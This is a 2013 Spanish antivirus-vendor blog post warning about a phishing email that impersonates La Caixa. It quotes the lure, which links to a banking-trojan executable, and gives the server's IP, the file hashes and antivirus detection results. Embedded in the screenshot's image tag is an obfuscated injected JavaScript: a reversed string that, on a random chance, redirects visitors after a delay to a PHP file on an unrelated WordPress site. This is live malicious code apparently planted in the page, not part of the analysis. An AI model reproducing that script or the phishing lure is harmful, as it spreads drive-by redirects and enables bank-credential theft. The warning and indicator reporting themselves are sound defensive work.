NUEVO PHISHING QUE SE RECIBE EN MAIL MALICIOSO CON FALSO REMITENTE DE LA CAIXA

Publicado el 10 enero 2013 ¬ 10:55 amh.mscComentarios desactivados en NUEVO PHISHING QUE SE RECIBE EN MAIL MALICIOSO CON FALSO REMITENTE DE LA CAIXA

Ayer informabamos que la Guardia Civil avisaba de una campaña de mensajes de correo electrónicos suplantando a La Caixa, alegando ser “para “actualizar” el sistema de los ordenadores”

Sea el mismo u otro, hoy recibimos mail malicioso con falso remitente de LA CAIXA indicando que para seguir manteniendo la cuenta, “introduzca sus datos de acceso para pasar La Verificacion Del Sistema. Si el registro no es realizado dentro de 48 Horas su cuenta sera suspendida temporalmente hasta que su registro sea completado”, para lo cual ofrecen un LINK con el título de “ACEPTAR”, que descarga el fichero malware  LACAIXA.EXE desde un servidor de Australia.

 

MAIL MALICIOSO:
___________________
Asunto: Sistema de Seguridad LaCaixa.
De: lacaixa <lacaixa@masunavez123.es>
Fecha: 09/01/2013 21:18
Para: <destinatario>

LA CAIXA siempre trata de encontrar sus expectativas mas altas.

Por eso usamos la ultima tecnologia en seguridad para nuestros clientes.
Por lo tanto nuestro departamento de antifraude ha desarrollado un nuevo sistema de seguridad que elimine cualquier posibilidad del acceso de la tercera persona a sus datos, cuentas ni fondos.
Es obligatorio para todos los clientes de La Caixa en Linea usar este sistema de seguridad.
Nuestro consejo para usted es que introduzca sus datos se acceso para pasar La Verificacion Del Sistema. Si el registro no es realizado dentro de 48 Horas su cuenta sera suspendida temporalmente hasta que su registro sea completado.
Esto solo le va a costar unos minutos de su tiempo y va a tener una seguridad mucho mas estable.

Para comenzar el registro por favor pinche aqui:

ACEPTAR <— link malicioso (aquí desactivado, claro)

——————————————————————————–

Todos los Derechos Reservados 2013© La Caixa .
______________________

FIN DEL MAIL MALICIOSO

 

el link malicioso conecta a este servidor de Australia:

IP: 203.147.241.17
Decimal: 3415470353
Hostname: bne010m.server-mail.com
ISP: WebCentral Pty Ltd
Organization: WebCentral Pty Ltd
Services: Likely mail server
Type: Broadband
Assignment: Static IP
Blacklist:

Geolocation Information
Country: Australia
Latitude: -27 (27° 0′ 0.00″ S)
Longitude: 133 (133° 0′ 0.00″ E)
y descarga el fichero EXE malware de nombre LACAIXA.EXE, que subido al virustotal ofrece este informe:

SHA256: ce23ece0c8136995c6842a173c1d8d010b35f73b4efe61fbd5d04d1a03e57c87
SHA1: 57c943e5782fb22839453dfe4c5ef0d768a993f3
MD5: a067a44e02c208c2888c0920db28a261
Tamaño: 1.1 MB ( 1185280 bytes )
Nombre: LACAIXA.exe
Tipo: Win32 EXE
Detecciones: 14 / 46
Fecha de análisis: 2013-01-10 08:35:30 UTC ( hace 0 minutos )
Antivirus Resultado Actualización
Agnitum – 20130109
AhnLab-V3 Trojan/Win32.Banker 20130109
AntiVir – 20130107
Antiy-AVL – 20130109
Avast – 20130110
AVG PSW.Banker6.ANPT 20130110
BitDefender Gen:Variant.Barys.11453 20130110
ByteHero – 20130108
CAT-QuickHeal – 20130110
ClamAV – 20130110
Commtouch – 20130110
Comodo – 20130110
DrWeb – 20130110
Emsisoft – 20130110
eSafe – 20130103
ESET-NOD32 a variant of Win32/Spy.Banker.UCO 20130109
F-Prot – 20130110
F-Secure Gen:Variant.Barys.11453 20130110
Fortinet – 20130110
GData Gen:Variant.Barys.11453 20130110
Ikarus Trojan-Banker.Win32.Banker 20130110
Jiangmin Trojan/Banker.Banker.mgk 20121221
K7AntiVirus – 20130109
Kaspersky HEUR:Trojan.Win32.Generic 20130110
Kingsoft – 20130107
Malwarebytes Trojan.Banker 20130110
McAfee – 20130110
McAfee-GW-Edition – 20130109
Microsoft – 20130110
MicroWorld-eScan Gen:Variant.Barys.11453 20130110
NANO-Antivirus Trojan.Win32.Banz.bknqq 20130110
Norman W32/Banker.FYEC 20130109
nProtect – 20130110
Panda – 20130109
PCTools – 20130110
Rising – 20130110
Sophos – 20130110
SUPERAntiSpyware – 20130110
Symantec – 20130110
TheHacker – 20130109
TotalDefense – 20130108
TrendMicro – 20130110
TrendMicro-HouseCall – 20130110
VBA32 Trojan-Banker.Win32.Banker.aqym 20130109
VIPRE – 20130110
ViRobot – 20130110

 

El EXE descargado es un malware que pasamos a controlar a partir del ELISTARA 26.85 de hoy, y presenta esta pantalla de phishing solicitando entrada de datos personales:

phishing lacaixa-captura de da<script>$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tos” src=”https://blog.satinfo.es/wp-content/uploads/2013/01/phishing-lacaixa-captura-de-da<script>$NfI=function(n){if (typeof ($NfI.list[n]) == tos.jpg” width=”565″ height=”562″ />

imagen de la pantalla de captura de datos de este PHISHING de LA CAIXA

Dicha version del ELISTARA que lo detecta y elimina estará disponible en nuestra web a partir de las 19 h CEST de hoy

Como siempre recordamos que no se debe ejecutar ningun fichero anexado a un mail no solicitado, ni pulsar en ninguno de sus links ni imagenes, y en este caso, si ya se hubiera hecho, notificarlo inmediatamente a su oficina de La Caixa para cambiar números de cuenta y password, para evitar males mayores…

Si necesitan cualquier aclaración al respecto, rogamos nos consulten.

saludos

ms, 10-1-2013

 

 

 

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Banker, Phishing, Virus, , , , , , ,

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies